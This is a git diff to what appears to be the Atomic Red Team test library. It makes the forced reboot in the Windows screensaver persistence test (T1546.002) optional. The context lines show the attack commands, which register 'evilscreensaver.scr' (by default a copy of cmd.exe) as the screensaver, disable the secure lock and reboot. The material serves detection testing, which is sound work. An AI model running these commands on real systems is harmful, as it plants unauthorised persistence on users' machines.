diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 25f3197d..fe9bbd74 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -38807,6 +38807,11 @@ privilege-escalation:
 description: Executable binary to use in place of screensaver for persistence
 type: Path
 default: C:\Windows\System32\cmd.exe
+ reboot:
+ description: Set to non-zero value if you want the test to reboot the system
+ so that changes take effect
+ type: Integer
+ default: 0
 executor:
 command: |
 reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
@@ -38815,7 +38820,7 @@ privilege-escalation:
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
- shutdown /r /t 0
+ if #{reboot} NEQ 0 shutdown /r /t 0
 cleanup_command: |
 reg import %userprofile%\backup.reg
 del %userprofile%\backup.reg
@@ -61441,6 +61446,11 @@ persistence:
 description: Executable binary to use in place of screensaver for persistence
 type: Path
 default: C:\Windows\System32\cmd.exe
+ reboot:
+ description: Set to non-zero value if you want the test to reboot the system
+ so that changes take effect
+ type: Integer
+ default: 0
 executor:
 command: |
 reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
@@ -61449,7 +61459,7 @@ persistence:
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
- shutdown /r /t 0
+ if #{reboot} NEQ 0 shutdown /r /t 0
 cleanup_command: |
 reg import %userprofile%\backup.reg
 del %userprofile%\backup.reg
diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md
index 7105d9b4..a6acf938 100644
--- a/atomics/T1546.002/T1546.002.md
+++ b/atomics/T1546.002/T1546.002.md
@@ -34,6 +34,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_binary | Executable binary to use in place of screensaver for persistence | Path | C:\Windows\System32\cmd.exe|
+| reboot | Set to non-zero value if you want the test to reboot the system so that changes take effect | Integer | 0|
 #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -46,7 +47,7 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
-shutdown /r /t 0
+if #{reboot} NEQ 0 shutdown /r /t 0
 ```
 #### Cleanup Commands: